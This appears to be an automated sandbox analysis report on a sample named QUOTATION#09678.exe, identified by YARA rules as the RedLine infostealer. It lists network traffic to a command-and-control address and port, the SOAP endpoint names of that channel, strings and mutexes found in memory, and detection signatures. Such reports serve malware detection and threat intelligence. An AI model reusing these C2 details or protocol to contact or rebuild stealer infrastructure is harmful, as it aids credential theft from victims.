Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.70.111.186:13484Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.70.111.186:13484
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.70.111.186:13484/
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.70.111.186:13484t-
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002B75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: Amcache.hve.16.dr	String found in binary or memory: http://upx.sf.net
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7564, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION#09678.exe

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7B9590	0_2_00007FFAAC7B9590
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7BCCF1	0_2_00007FFAAC7BCCF1
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7BF879	0_2_00007FFAAC7BF879
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7BA090	0_2_00007FFAAC7BA090
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7C601E	0_2_00007FFAAC7C601E
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7BC910	0_2_00007FFAAC7BC910
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7B5440	0_2_00007FFAAC7B5440
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7B1700	0_2_00007FFAAC7B1700
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7C606B	0_2_00007FFAAC7C606B
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7C60F3	0_2_00007FFAAC7C60F3
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7B5300	0_2_00007FFAAC7B5300
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7C1417	0_2_00007FFAAC7C1417
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC890001	0_2_00007FFAAC890001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00F7E7B0	11_2_00F7E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00F7DC90	11_2_00F7DC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050D2758	11_2_050D2758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050D0B48	11_2_050D0B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050D2B98	11_2_050D2B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050D72B8	11_2_050D72B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050D04D0	11_2_050D04D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050D2FD0	11_2_050D2FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_050DCAF0	11_2_050DCAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060C4508	11_2_060C4508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060C96D0	11_2_060C96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060C1210	11_2_060C1210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060C33B1	11_2_060C33B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060CDDB8	11_2_060CDDB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060CDAC4	11_2_060CDAC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_060CD5C8	11_2_060CD5C8

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6704 -s 1332

Source: QUOTATION#09678.exe

Static PE information: No import functions for PE file found

Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CA579000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAnorimolawid@ vs QUOTATION#09678.exe
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION#09678.exe
Source: QUOTATION#09678.exe, 00000000.00000002.1679888817.000001D8B90D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAnorimolawid@ vs QUOTATION#09678.exe
Source: QUOTATION#09678.exe, 00000000.00000000.1231139749.000001D8B7366000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameKostanay.exeB vs QUOTATION#09678.exe
Source: QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CA44D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAnorimolawid@ vs QUOTATION#09678.exe
Source: QUOTATION#09678.exe	Binary or memory string: OriginalFilenameKostanay.exeB vs QUOTATION#09678.exe

Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7564, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: QUOTATION#09678.exe, PrintIReadOnlyDictionary2.cs

Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@11/53@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
